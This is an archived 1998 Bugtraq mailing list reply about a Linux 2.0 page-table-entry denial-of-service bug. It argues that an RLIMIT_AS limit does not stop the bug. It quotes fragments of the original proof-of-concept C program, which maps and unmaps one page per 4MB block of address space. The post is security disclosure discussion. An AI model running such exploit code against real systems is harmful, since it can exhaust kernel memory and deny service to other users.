Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: linux 2.0 PTE bug
From: peak () kerberos troja mff cuni cz (Pavel Kankovsky)
Date: Thu, 28 May 1998 21:23:34 +0200


On Tue, 26 May 1998 pedward () WEBCOM COM wrote:

(it really has nothing to do with resources).  The main factor is RLIMIT_AS,
defined in /usr/src/linux/include/asm/resource.h, it controls how much virtual
memory that a process can map, mmap utilizes virtual memory.  You can
safely throttle people by running a program which calls setrlimit(2) with
RLIMIT_AS as the resource.  By far, 3GB is too much.

This is only a DoS if you LET it be a DoS.


No. Re-read the program carefully:

<quote author="p6mip300 () INFOP6 CICRP JUSSIEU FR">

void the_handler(int x)
{
  signal(SIGSEGV, the_handler);

  touch_me++;

  if(mmap((void *)address, 4, PROT_READ,
        MAP_FIXED|MAP_PRIVATE, fd, 0)==(void *)-1) {
    perror("mmap");
    exit(1);
  }
}

void main(void)
{
[...]
  signal(SIGSEGV, the_handler);

  /* 3*1024*1024*1024 = TASK_SIZE,
   * 1024*4096 = number of bytes one pte can map */
  for (address=0; address<3*1024*1024*1024; address+=1024*4096) {
    i=*(unsigned long *)address;
    if (touch_me) {
      touch_me=0;
      munmap((void *)address, 4);
    }
  }
[...]
}

</quote>

The program allocates ONE page for each 4MB block of address space. This
makes 768 pages (3MB). It would hardly hit a (reasonable) AS limit even if
it did not disallocate the page having touched it.

It can run with RLIMIT_AS set to 1MB. At least on my system--I have
tried it (according to /proc/*/status, VmSize was 904 kB).


--Pavel Kankovsky aka Peak  [ Boycott Microsoft--http://www.vcnet.com/bms ]



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault